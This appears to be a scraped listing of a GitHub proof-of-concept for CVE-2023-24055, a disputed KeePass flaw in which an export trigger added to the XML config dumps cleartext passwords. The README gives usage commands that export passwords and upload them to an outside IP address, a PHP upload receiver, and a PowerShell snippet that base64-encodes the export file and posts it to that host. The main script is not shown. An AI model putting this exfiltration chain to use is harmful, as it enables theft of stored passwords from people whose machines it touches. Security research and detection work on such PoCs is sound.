CVE-2023-24055 PoC — KeePass 安全漏洞

Source

Associated Vulnerability

Description

CVE-2023-24055 POC written in PowerShell.

Readme

![alt text](https://github.com/ATTACKnDEFEND/CVE-2023-24055-POC/blob/main/images/KLEARPASS.png)

## Disclaimer

This script is for educational and demonstration purposes only. The author does not endorse or condone the use of this script for any criminal or malicious activities and it should only be used where explicitly allowed with proper permission.

This script should be used with caution, as it will alter the KeePass configuration file and delete any previously configured triggers. Use of this script may result in unexpected behavior and potentially break the KeePass application. Use at your own risk.

## Introduction

This script demonstrates the ** DISPUTED ** vulnerability (CVE-2023-24055) of KeePass through version 2.53 (in a default installation) as it allows an attacker with write access to the XML configuration file to obtain the cleartext passwords by adding an export trigger. Note that the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.

Reference: 
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055
- https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
- https://keepass.info/

## Instructions

To use this script, run it in PowerShell and provide the necessary parameters. The mandatory parameters are:

- `-filename`: The full file path and name of the file for the passwords to be exported.

The optional parameters are:
- `-uploadURL`: This switch is used to specify that the data should be uploaded to the specified URL. 
- `-url`: The URL to which the data should be uploaded.

### Example Usage

Export cleartext passwords:

```
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt
```
Export cleartext passwords and upload export to web server:

```
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt -uploadURL http://192.168.238.141/KeePass/upload.php
```

Detailed help:
```
get-help .\KlearPass.ps1 -Detailed
```

### Example PHP script to upload file on webserver

```
<?php
if (!empty($_POST['filename']) && !empty($_POST['data'])) {
    $target_directory = '/var/www/html/KeePass/uploads/';
    $filename = $target_directory . $_POST['filename'];
    $data = base64_decode($_POST['data']);
    file_put_contents($filename, $data);
}
?>
```

### Example PowerShell script to test PHP upload
```
$filename = "c:\windows\tasks\export.txt";
$file = [System.IO.Path]::GetFileName($filename);
$encodedFile = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($filename)));
$http = New-Object System.Net.WebClient;
$http.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$http.UploadString("http://192.168.238.141/KeePass/upload.php", "filename=$file&data=$encodedFile");
```

## Credits

- Script initially based off code found in https://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeePassConfig.ps1
- Idea of exfiltrating the export is credited to https://github.com/alt3kx/CVE-2023-24055_PoC.

File Snapshot

 [4.0K]  /data/pocs/57fc3e6d39ed9781666f7c59b3975b2c76d475b1
├── [4.0K]  images
│   └── [ 17K]  KLEARPASS.png
├── [6.5K]  KlearPass.ps1
└── [3.0K]  README.md

1 directory, 3 files

Remarks